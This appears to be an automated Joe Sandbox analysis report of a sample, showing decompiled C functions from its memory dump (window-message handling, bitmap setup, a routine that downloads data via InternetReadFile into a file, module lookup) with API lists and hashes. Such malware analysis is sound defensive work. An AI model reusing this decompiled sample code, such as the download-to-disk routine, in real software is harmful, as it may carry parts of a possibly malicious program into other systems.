				_push(__ecx);
				_t75 = _a16;
				_t79 = __eax;
				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
					_t64 = GetAncestor(_a4, 2);
					if(_t64 ==  *(_t79 + 0x170)) {
						goto L8;
					}
					_t69 = _a12 & 0x0000ffff;
					_t47 = SendMessageTimeoutW(_a4, 0x21, _t64, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
						 *(_t79 + 0x170) = _t64;
						goto L8;
					} else {
						goto L35;
					}
				} else {
					L8:
					_t65 = _a12 & 0x0000ffff;
					_v8 = _t65;
					_t46 = PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t65);
					if(_a12 != 1) {
						_t47 = E012CD192(_t69, _t79, _a4, _a20);
						_a20 = _t47;
						__eflags = _t65 - 8;
						if(__eflags > 0) {
							__eflags = _t65 - 9;
							if(__eflags == 0) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									__eflags = _t47 - 0xa5;
									if(_t47 != 0xa5) {
										L35:
										return _t47;
									}
									_t47 = 0xffff;
									L59:
									__eflags = _t47;
									if(_t47 == 0) {
										goto L35;
									}
									__eflags = _t47 - 0xffff;
									if(_t47 != 0xffff) {
										L33:
										_push(_a28);
										_push(_t47 & 0x0000ffff);
										_push(0x112);
										L34:
										_t47 = PostMessageW(_a4, ??, ??, ??);
										goto L35;
									}
									L61:
									_push(_a28);
									_push(_a4);
									_push(0x7b);
									goto L34;
								}
								_t47 =  *(_a8 + 0x24);
								__eflags = _t47 & 0x00010000;
								if((_t47 & 0x00010000) == 0) {
									goto L35;
								}
								asm("sbb eax, eax");
								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
								goto L59;
							}
							if(__eflags <= 0) {
								L25:
								_push(_a28);
								_push(_t65);
								L10:
								_push(_t47);
								goto L34;
							}
							__eflags = _t65 - 0x11;
							if(_t65 <= 0x11) {
								L40:
								__eflags = _t47 - 0xa1;
								if(_t47 == 0xa1) {
									_t47 = E012CD002(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
								}
								goto L35;
							}
							__eflags = _t65 - 0x14;
							if(_t65 == 0x14) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									L21:
									__eflags = _t47 - 0xa5;
									L22:
									if(__eflags != 0) {
										goto L35;
									}
									goto L61;
								}
								L32:
								_t47 = 0xf060;
								goto L33;
							}
							__eflags = _t65 - 0x15;
							if(_t65 != 0x15) {
								goto L25;
							}
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = 0xf180;
							goto L33;
						}
						if(__eflags == 0) {
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = _a8;
							__eflags =  *(_t47 + 0x24) & 0x00020000;
							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
								goto L35;
							}
							_t47 = 0xf020;
							goto L33;
						}
						__eflags = _t65 - 2;
						if(_t65 == 2) {
							__eflags = _t47 - 0xa3;
							if(_t47 == 0xa3) {
								goto L25;
							}
							__eflags = _t47 - 0xa5;
							if(_t47 == 0xa5) {
								goto L61;
							}
							goto L40;
						}
						__eflags = _t65 - 3;
						if(_t65 == 3) {
							__eflags = _t47 - 0xa3;
							if(_t47 != 0xa3) {
								__eflags = _t47 - 0xa5;
								if(_t47 == 0xa5) {
									goto L61;
								}
								__eflags = _t47 - 0xa1;
								goto L22;
							}
							goto L32;
						}
						__eflags = _t65 - 5;
						if(_t65 == 5) {
							__eflags = _t47 - 0xa1;
							if(_t47 != 0xa1) {
								__eflags = _t47 - 0xa0;
								if(_t47 != 0xa0) {
									goto L35;
								}
								_push(0);
								_push(0xfffffffe);
								L28:
								_push( *((intOrPtr*)(_t79 + 8)));
								goto L34;
							}
							_push(0);
							_push(0xffffffff);
							goto L28;
						}
						__eflags = _t65 - 6 - 1;
						if(_t65 - 6 > 1) {
							goto L25;
						}
						__eflags = _t47 - 0xa1;
						if(_t47 == 0xa1) {
							E012CD002(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
							_t47 = _a20;
							_t65 = _v8;
							goto L25;
						}
						__eflags = _t47 - 0xa2;
						if(_t47 == 0xa2) {
							goto L25;
						}
						__eflags = _t47 - 0xa3;
						if(_t47 == 0xa3) {
							goto L25;
						}
						__eflags = _t47 - 0xa0;
						if(_t47 == 0xa0) {
							goto L25;
						}
						goto L21;
					}
					_t57 = L012B167C(_t46, _t79, 0, 0);
					_push(_a24);
					_push(_t57 & 0x0000ffff);
					_t47 = E012CD192(_t79, _t79, _a4, _a16);
					goto L10;
				}
			}

0x012cd271
0x012cd274
0x012cd278
0x012cd27b
0x012cd283
0x012cd2a0
0x012cd2a8
0x00000000
0x00000000
0x012cd2aa
0x012cd2c5
0x012cd2cd
0x012cd2e3
0x00000000
0x00000000
0x00000000
0x00000000
0x012cd2e9
0x012cd2e9
0x012cd2e9
0x012cd2ff
0x012cd307
0x012cd30e
0x012cd339
0x012cd33e
0x012cd341
0x012cd344
0x012cd45b
0x012cd45e
0x012cd4a3
0x012cd4a8
0x012cd4d3
0x012cd4d8
0x012cd3f2
0x012cd3f6
0x012cd3f6
0x012cd4de
0x012cd4e0
0x012cd4e0
0x012cd4e3
0x00000000
0x00000000
0x012cd4e9
0x012cd4ec
0x012cd3e1
0x012cd3e1
0x012cd3e7
0x012cd3e8
0x012cd3ed
0x012cd3f0
0x00000000
0x012cd3f0
0x012cd4f2
0x012cd4f2
0x012cd4f5
0x012cd4f8
0x00000000
0x012cd4f8
0x012cd4ad
0x012cd4b0
0x012cd4b5
0x00000000
0x00000000
0x012cd4c2
0x012cd4ce
0x00000000
0x012cd4ce
0x012cd460
0x012cd3af
0x012cd3af
0x012cd3b2
0x012cd32d
0x012cd32d
0x00000000
0x012cd32d
0x012cd466
0x012cd469
0x012cd41d
0x012cd41d
0x012cd422
0x012cd436
0x012cd436
0x00000000
0x012cd422
0x012cd46b
0x012cd46e
0x012cd48e
0x012cd493
0x012cd387
0x012cd387
0x012cd38c
0x012cd38c
0x00000000
0x00000000
0x00000000
0x012cd38e
0x012cd3dc
0x012cd3dc
0x00000000
0x012cd3dc
0x012cd470
0x012cd473
0x00000000
0x00000000
0x012cd479
0x012cd47e
0x00000000
0x00000000
0x012cd484
0x00000000
0x012cd484
0x012cd34a
0x012cd43d
0x012cd442
0x00000000
0x00000000
0x012cd448
0x012cd44b
0x012cd452
0x00000000
0x00000000
0x012cd454
0x00000000
0x012cd454
0x012cd350
0x012cd353
0x012cd40b
0x012cd410
0x00000000
0x00000000
0x012cd412
0x012cd417
0x00000000
0x00000000
0x00000000
0x012cd417
0x012cd359
0x012cd35c
0x012cd3d5
0x012cd3da
0x012cd3f9
0x012cd3fe
0x00000000
0x00000000
0x012cd404
0x00000000
0x012cd404
0x00000000
0x012cd3da
0x012cd35e
0x012cd361
0x012cd3b8
0x012cd3bd
0x012cd3c8
0x012cd3cd
0x00000000
0x00000000
0x012cd3cf
0x012cd3d1
0x012cd3c3
0x012cd3c3
0x00000000
0x012cd3c3
0x012cd3bf
0x012cd3c1
0x00000000
0x012cd3c1
0x012cd366
0x012cd369
0x00000000
0x00000000
0x012cd36b
0x012cd370
0x012cd3a4
0x012cd3a9
0x012cd3ac
0x00000000
0x012cd3ac
0x012cd372
0x012cd377
0x00000000
0x00000000
0x012cd379
0x012cd37e
0x00000000
0x00000000
0x012cd380
0x012cd385
0x00000000
0x00000000
0x00000000
0x012cd385
0x012cd316
0x012cd31b
0x012cd321
0x012cd328
0x00000000
0x012cd328

APIs

GetAncestor.USER32(?,00000002), ref: 012CD29A
SendMessageTimeoutW.USER32 ref: 012CD2C5
PostMessageW.USER32(?,00000020,?,00000000), ref: 012CD307
GetWindowThreadProcessId.USER32(?,00000000), ref: 012CD39D
PostMessageW.USER32(?,00000112,?,?), ref: 012CD3F0
GetWindowThreadProcessId.USER32(?,00000000), ref: 012CD42F

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
String ID:
API String ID: 1223205383-0
Opcode ID: db1cb4f56371dc3e907e8ae506a7afe2a246b220bc8ff5e343cfbd494ed21a71
Instruction ID: e42b07c5a43cd1ad20fe1495edf514c01e22dc3410151ff5f47252fa8787340a
Opcode Fuzzy Hash: db1cb4f56371dc3e907e8ae506a7afe2a246b220bc8ff5e343cfbd494ed21a71
Instruction Fuzzy Hash: BC519C3062025EEAFF315B9CCC89BBE3A65EB05B50F14063AFB45D7091C276D4819AE2

Uniqueness

Uniqueness Score: -1.00%

Function 012D17DE Relevance: 9.2, APIs: 6, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E012D17DE(intOrPtr* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v21;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _v40;
				char* _v44;
				struct _GOPHER_FIND_DATAA _v48;
				long _v52;
				signed int _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr _t125;
				signed int _t128;
				signed int _t137;
				signed char _t160;
				signed int _t170;
				struct _GOPHER_FIND_DATAA _t172;
				struct _GOPHER_FIND_DATAA _t173;
				signed int* _t178;
				void* _t208;

				_v64 = __edx;
				_v60 = __ecx;
				_v8 = _v8 | 0xffffffff;
				EnterCriticalSection(0x12dda14);
				_v12 = E012D104F( *_v60);
				if(_v12 == 0xffffffff ||  *((intOrPtr*)( *0x12dda2c + 0x10 + _v12 * 0x24)) <= 0) {
					L34:
					LeaveCriticalSection(0x12dda14);
					return _v8;
				} else {
					_v16 = _v12 * 0x24 +  *0x12dda2c;
					if((L012B11BD( *((intOrPtr*)(_v16 + 0xc)),  *((intOrPtr*)(_v16 + 0x10))) & 0x000000ff) == 0) {
						__eflags = _a8;
						if(_a8 != 0) {
							_t178 = _a8;
							 *_t178 =  *_t178 & 0x00000000;
							__eflags =  *_t178;
						}
						__eflags =  *((intOrPtr*)(_v16 + 0x18)) - 0xffffffff;
						if(__eflags != 0) {
							L22:
							_t125 = _v16;
							__eflags =  *((intOrPtr*)(_t125 + 0x18)) - 0xffffffff;
							if( *((intOrPtr*)(_t125 + 0x18)) != 0xffffffff) {
								__eflags = _v8 - 0xffffffff;
								if(_v8 == 0xffffffff) {
									_t128 =  *((intOrPtr*)(_v16 + 0x18)) -  *(_v16 + 0x1c);
									__eflags = _t128;
									_v56 = _t128;
									if(_t128 != 0) {
										__eflags = _v64;
										if(_v64 == 0) {
											_a4 = L012B1AEB(0x1000, 0x2000);
										}
										__eflags = _a4 - _v56;
										if(_a4 < _v56) {
											_v56 = _a4;
										}
										__eflags = _v64;
										if(_v64 != 0) {
											L012B1947(_v64,  *((intOrPtr*)(_v16 + 0x14)) +  *(_v16 + 0x1c), _v56);
											_t137 =  *(_v16 + 0x1c) + _v56;
											__eflags = _t137;
											 *(_v16 + 0x1c) = _t137;
										}
									}
									__eflags = _a8;
									if(_a8 != 0) {
										 *_a8 = _v56;
									}
									_v8 = 1;
								}
							}
							goto L34;
						}
						_v32 =  *((intOrPtr*)(_v16 + 4));
						LeaveCriticalSection(0x12dda14);
						_v21 = E012D1B0D( *_v60, _v32, __eflags,  &_v20,  &_v28);
						EnterCriticalSection(0x12dda14);
						__eflags = _v21 & 0x000000ff;
						if((_v21 & 0x000000ff) == 0) {
							L9:
							__eflags = _v21 & 0x000000ff;
							if((_v21 & 0x000000ff) != 0) {
								L012B1933(_v20);
							}
							_v8 = _v8 & 0x00000000;
							SetLastError(0x2ee4);
							goto L22;
						}
						_v12 = E012D104F( *_v60);
						__eflags = _v12 - 0xffffffff;
						if(_v12 != 0xffffffff) {
							_v16 = _v12 * 0x24 +  *0x12dda2c;
							_push( &_v36);
							_t208 = 0x22;
							_v40 = L012B10F0( *_v60, _t208);
							_push( *((intOrPtr*)(_v16 + 0x10)));
							_push( *((intOrPtr*)(_v16 + 0xc)));
							_push( &_v28);
							_t160 = L012B17EE(_v40,  &_v20);
							__eflags = _t160 & 0x000000ff;
							if((_t160 & 0x000000ff) != 0) {
								_v44 = L012B1596(_v40, _v36);
								__eflags = _v44;
								if(_v44 != 0) {
									_v52 = 0x1000;
									_v48 = L012B1C17(_v52);
									__eflags = _v48;
									if(_v48 != 0) {
										 *_v48 = 0x50;
										_t170 = GetUrlCacheEntryInfoW(_v44, _v48,  &_v52);
										__eflags = _t170;
										if(_t170 != 0) {
											_t172 = _v48;
											__eflags =  *(_t172 + 8);
											if( *(_t172 + 8) != 0) {
												_t173 = _v48;
												__eflags =  *( *(_t173 + 8)) & 0x0000ffff;
												if(( *( *(_t173 + 8)) & 0x0000ffff) != 0) {
													L012B14A1( *((intOrPtr*)(_v48 + 8)), _v20, _v28);
												}
											}
										}
										L012B1933(_v48);
									}
									L012B1933(_v44);
								}
							}
							L012B1933(_v40);
							 *((intOrPtr*)(_v16 + 0x14)) = _v20;
							 *((intOrPtr*)(_v16 + 0x18)) = _v28;
							goto L22;
						}
						goto L9;
					} else {
						 *_v60 =  *((intOrPtr*)(_v16 + 0x20));
						goto L34;
					}
				}
			}

0x012d17e4
0x012d17e7
0x012d17ea
0x012d17f3
0x012d1803
0x012d180a
0x012d1a58
0x012d1a5d
0x012d1a67
0x012d1827
0x012d1833
0x012d184c
0x012d185e
0x012d1862
0x012d1864
0x012d1867
0x012d1867
0x012d1867
0x012d186d
0x012d1871
0x012d19d0
0x012d19d0
0x012d19d3
0x012d19d7
0x012d19d9
0x012d19dd
0x012d19e8
0x012d19e8
0x012d19eb
0x012d19ee
0x012d19f0
0x012d19f4
0x012d1a05
0x012d1a05
0x012d1a0b
0x012d1a0e
0x012d1a13
0x012d1a13
0x012d1a16
0x012d1a1a
0x012d1a2f
0x012d1a3a
0x012d1a3a
0x012d1a40
0x012d1a40
0x012d1a1a
0x012d1a43
0x012d1a47
0x012d1a4f
0x012d1a4f
0x012d1a51
0x012d1a51
0x012d19dd
0x00000000
0x012d19d7
0x012d187d
0x012d1885
0x012d18a0
0x012d18a8
0x012d18b2
0x012d18b4
0x012d18c9
0x012d18cd
0x012d18cf
0x012d18d4
0x012d18d4
0x012d18d9
0x012d18e2
0x00000000
0x012d18e2
0x012d18c0
0x012d18c3
0x012d18c7
0x012d18f9
0x012d18ff
0x012d1902
0x012d190d
0x012d1913
0x012d1919
0x012d191f
0x012d1926
0x012d192e
0x012d1930
0x012d1941
0x012d1944
0x012d1948
0x012d194a
0x012d1959
0x012d195c
0x012d1960
0x012d1965
0x012d1975
0x012d197b
0x012d197d
0x012d197f
0x012d1982
0x012d1986
0x012d1988
0x012d1991
0x012d1993
0x012d19a1
0x012d19a1
0x012d1993
0x012d1986
0x012d19a9
0x012d19a9
0x012d19b1
0x012d19b1
0x012d1948
0x012d19b9
0x012d19c4
0x012d19cd
0x00000000
0x012d19cd
0x00000000
0x012d184e
0x012d1857
0x00000000
0x012d1857
0x012d184c

APIs

EnterCriticalSection.KERNEL32(012DDA14), ref: 012D17F3
LeaveCriticalSection.KERNEL32(012DDA14), ref: 012D1885
EnterCriticalSection.KERNEL32(012DDA14,00000000,000000FF), ref: 012D18A8
SetLastError.KERNEL32(00002EE4), ref: 012D18E2
LeaveCriticalSection.KERNEL32(012DDA14), ref: 012D1A5D

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ErrorLast
String ID:
API String ID: 486337731-0
Opcode ID: d38e5544bb71a263c0c3f95d11c140cd1d6c88bea87ee3995192922aa0ab4aea
Instruction ID: cadde5b6aa6901988c5df40d69cfb0a050a0ae3d04ab88e4502e3982f4a9b190
Opcode Fuzzy Hash: d38e5544bb71a263c0c3f95d11c140cd1d6c88bea87ee3995192922aa0ab4aea
Instruction Fuzzy Hash: F291D774E1020AEFDB14DFA9D494AEDBBB1FF48310F148159E921AB290D730AA55CF51

Uniqueness

Uniqueness Score: -1.00%

Function 012BA2E7 Relevance: 9.1, APIs: 6, Instructions: 108
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E012BA2E7(struct HDC__* __ecx, int __edx, void* _a4, BITMAPINFO** _a8, void** _a12, void* _a16, long _a20) {
				struct HDC__* _v8;
				int _v12;
				struct HBITMAP__* _t30;
				void* _t40;
				long _t41;
				struct HBITMAP__* _t49;
				void* _t50;
				signed int _t61;
				signed int _t62;
				BITMAPINFO** _t67;
				BITMAPINFO* _t69;

				_t62 = __edx;
				_push(__ecx);
				_push(__ecx);
				_v8 = __ecx;
				_v12 = 0;
				_t30 = CreateCompatibleBitmap(__ecx, __edx, _a4);
				_a4 = _t30;
				if(_t30 == 0) {
					L18:
					return _v12;
				}
				_t69 = L012B1C17(0x428);
				if(_t69 == 0) {
					L15:
					if(_a4 != 0) {
						DeleteObject(_a4);
					}
					L17:
					goto L18;
				}
				_t69->bmiHeader = 0x28;
				if(GetDIBits(_v8, _a4, 0, 1, 0, _t69, 0) == 0 || GetDIBits(_v8, _a4, 0, 1, 0, _t69, 0) == 0) {
					L14:
					L012B1933(_t69);
					goto L15;
				} else {
					DeleteObject(_a4);
					asm("cdq");
					_t61 =  ~((_t69->bmiHeader.biHeight ^ __edx) - __edx);
					_t40 = (_t69->bmiHeader.biBitCount & 0x0000ffff) - 1;
					_a4 = 0;
					_t69->bmiHeader.biHeight = _t61;
					if(_t40 == 0) {
						L8:
						_t69->bmiHeader.biClrUsed = 0;
						_push(8);
						_t69->bmiHeader.biClrImportant = 0;
						L9:
						_pop(_t41);
						_t69->bmiHeader.biBitCount = _t41;
						L10:
						_t67 = _a8;
						asm("cdq");
						_t63 = _t62 & 0x00000007;
						asm("cdq");
						_t69->bmiHeader.biSizeImage = ((_t69->bmiHeader.biBitCount & 0x0000ffff) * _t69->bmiHeader.biWidth * _t61 + (_t62 & 0x00000007) >> 0x00000003 ^ _t63) - _t63;
						_t69->bmiHeader.biCompression = 0;
						if(_t67 != 0) {
							 *_t67 = _t69;
						}
						_t49 = CreateDIBSection(_v8, _t69, 0, _a12, _a16, _a20);
						_v12 = _t49;
						if(_t49 == 0 || _t67 == 0) {
							goto L14;
						} else {
							goto L17;
						}
					}
					_t50 = _t40 - 3;
					if(_t50 == 0) {
						goto L8;
					}
					if(_t50 != 0x14) {
						goto L10;
					}
					_push(0x20);
					goto L9;
				}
			}

0x012ba2e7
0x012ba2ea
0x012ba2eb
0x012ba2f4
0x012ba2f7
0x012ba2fa
0x012ba300
0x012ba305
0x012ba3f4
0x012ba3f9
0x012ba3f9
0x012ba317
0x012ba31b
0x012ba3e4
0x012ba3e7
0x012ba3ec
0x012ba3ec
0x012ba3f2
0x00000000
0x012ba3f3
0x012ba330
0x012ba33d
0x012ba3dd
0x012ba3df
0x00000000
0x012ba359
0x012ba35c
0x012ba365
0x012ba370
0x012ba372
0x012ba373
0x012ba376
0x012ba379
0x012ba389
0x012ba389
0x012ba38c
0x012ba38e
0x012ba391
0x012ba391
0x012ba392
0x012ba396
0x012ba39e
0x012ba3a4
0x012ba3a5
0x012ba3ad
0x012ba3b2
0x012ba3b5
0x012ba3ba
0x012ba3bc
0x012ba3bc
0x012ba3cc
0x012ba3d2
0x012ba3d7
0x00000000
0x00000000
0x00000000
0x00000000
0x012ba3d7
0x012ba37b
0x012ba37e
0x00000000
0x00000000
0x012ba383
0x00000000
0x00000000
0x012ba385
0x00000000
0x012ba385

APIs

CreateCompatibleBitmap.GDI32(?,?,?), ref: 012BA2FA
GetDIBits.GDI32(?,?,00000000,00000001,00000000,00000000,00000000), ref: 012BA339
GetDIBits.GDI32(?,?,00000000,00000001,00000000,00000000,00000000), ref: 012BA34F
DeleteObject.GDI32(?), ref: 012BA35C
CreateDIBSection.GDI32(?,00000000,00000000,?,?,?), ref: 012BA3CC
DeleteObject.GDI32(?), ref: 012BA3EC

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: BitsCreateDeleteObject$BitmapCompatibleSection
String ID:
API String ID: 2572915924-0
Opcode ID: e3435ef6e28a1b6ae770f1ecbe4677ff88b7a21a60f49377a1b31e71dd02f816
Instruction ID: 7bcff9c206d9718103b85780ca751b47be61b9a4558fd3a28c4a383dcc9c557a
Opcode Fuzzy Hash: e3435ef6e28a1b6ae770f1ecbe4677ff88b7a21a60f49377a1b31e71dd02f816
Instruction Fuzzy Hash: 4631CFB251220AFFEF209F68DCC49AE7EA9FF48380B00852DF64697550D771D940DB60

Uniqueness

Uniqueness Score: -1.00%

Function 012BBCC0 Relevance: 9.1, APIs: 6, Instructions: 76
filesynchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012BBCC0(void* __ecx, WCHAR* __edx, intOrPtr _a4, void* _a8) {
				char _v5;
				long _v12;
				struct _OVERLAPPED* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				WCHAR* _v32;
				void* _t28;
				long _t37;
				void* _t46;

				_v32 = __edx;
				_v24 = __ecx;
				_v5 = 0;
				_t46 = CreateFileW(__edx, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t46 == 0xffffffff) {
					L15:
					return _v5;
				}
				_t28 = L012B1C17(0x1000);
				_v20 = _t28;
				if(_t28 == 0) {
					L13:
					CloseHandle(_t46);
					if(_v5 == 0) {
						L012B1640(_v32);
					}
					goto L15;
				}
				_v16 = 0;
				while(_a8 == 0 || WaitForSingleObject(_a8, 0) == 0x102) {
					if(InternetReadFile(_v24, _v20, 0x1000,  &_v12) == 0) {
						break;
					}
					if(_v12 == 0) {
						FlushFileBuffers(_t46);
						_v5 = 1;
						break;
					}
					if(WriteFile(_t46, _v20, _v12,  &_v28, 0) == 0) {
						break;
					}
					_t37 = _v12;
					if(_t37 != _v28) {
						break;
					}
					_v16 = _v16 + _t37;
					if(_v16 <= _a4) {
						continue;
					}
					break;
				}
				L012B1933(_v20);
				goto L13;
			}

0x012bbcdb
0x012bbcde
0x012bbce1
0x012bbcea
0x012bbcef
0x012bbd8f
0x012bbd95
0x012bbd95
0x012bbcfa
0x012bbcff
0x012bbd04
0x012bbd7b
0x012bbd7c
0x012bbd85
0x012bbd8a
0x012bbd8a
0x00000000
0x012bbd85
0x012bbd06
0x012bbd09
0x012bbd36
0x00000000
0x00000000
0x012bbd3b
0x012bbd69
0x012bbd6f
0x00000000
0x012bbd6f
0x012bbd51
0x00000000
0x00000000
0x012bbd53
0x012bbd59
0x00000000
0x00000000
0x012bbd5b
0x012bbd64
0x00000000
0x00000000
0x00000000
0x012bbd66
0x012bbd76
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 012BBCE4
WaitForSingleObject.KERNEL32(?,00000000,?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 012BBD12
InternetReadFile.WININET(?,?,00001000,?), ref: 012BBD2E
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 012BBD49
FlushFileBuffers.KERNEL32(00000000,?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 012BBD69
CloseHandle.KERNEL32(00000000,?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 012BBD7C

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
String ID:
API String ID: 3509176705-0
Opcode ID: a74ab7d9bbf5d602101f76d53a8b00c321f22b2568e002ec25dbecfb1fe7fa9e
Instruction ID: 3e764b09f30f1e0e9ab9367271c2aae4172ef9bf38eec85ac09afa3179158b47
Opcode Fuzzy Hash: a74ab7d9bbf5d602101f76d53a8b00c321f22b2568e002ec25dbecfb1fe7fa9e
Instruction Fuzzy Hash: FD219230E1020BBFDF119FA9DCC8BFE7BB9AF44390F144069E211A6195D7385945CB12

Uniqueness

Uniqueness Score: -1.00%

Function 012B4D7D Relevance: 9.1, APIs: 6, Instructions: 75
stringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E012B4D7D(intOrPtr __ecx, WCHAR* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				unsigned int _v20;
				WCHAR* _v24;
				char _v28;
				short _v548;
				char* _t28;
				unsigned int* _t33;
				WCHAR* _t35;
				void* _t41;
				void* _t47;
				signed int _t49;

				_v24 = __edx;
				_v12 = __ecx;
				_t3 = PathIsRelativeW(__edx) - 1; // -1
				_push( &_v8);
				_push(4);
				_t28 =  &_v28;
				asm("sbb bl, bl");
				_push(_t28);
				_push(_v12);
				_t49 = 0;
				_t41 =  ~_t3 + 1;
				_v16 = 0;
				L012D24D8();
				if(_t28 != 0) {
					_t47 = L012B1C17(_v8);
					if(_t47 != 0) {
						_v20 = _v8 >> 2;
						_t33 =  &_v8;
						_push(_t33);
						_push(_v8);
						_push(_t47);
						_push(_v12);
						L012D24D8();
						if(_t33 != 0 && _v20 > 0) {
							while(1) {
								_push(0x104);
								_t35 =  &_v548;
								_push(_t35);
								_push( *((intOrPtr*)(_t47 + _t49 * 4)));
								_push(_v12);
								if(_t41 == 0) {
									L012D24CC();
								} else {
									L012D24D2();
								}
								if(_t35 != 0 && lstrcmpiW( &_v548, _v24) == 0) {
									break;
								}
								_t49 = _t49 + 1;
								if(_t49 < _v20) {
									continue;
								} else {
								}
								goto L12;
							}
							_v16 =  *((intOrPtr*)(_t47 + _t49 * 4));
						}
						L12:
						L012B1933(_t47);
					}
				}
				return _v16;
			}

0x012b4d89
0x012b4d8c
0x012b4d95
0x012b4d9b
0x012b4d9c
0x012b4d9e
0x012b4da3
0x012b4da5
0x012b4da6
0x012b4da9
0x012b4dab
0x012b4dad
0x012b4db0
0x012b4db7
0x012b4dc6
0x012b4dca
0x012b4dd2
0x012b4dd5
0x012b4dd8
0x012b4dd9
0x012b4ddc
0x012b4ddd
0x012b4de0
0x012b4de7
0x012b4dee
0x012b4dee
0x012b4df3
0x012b4df9
0x012b4dfa
0x012b4dfd
0x012b4e02
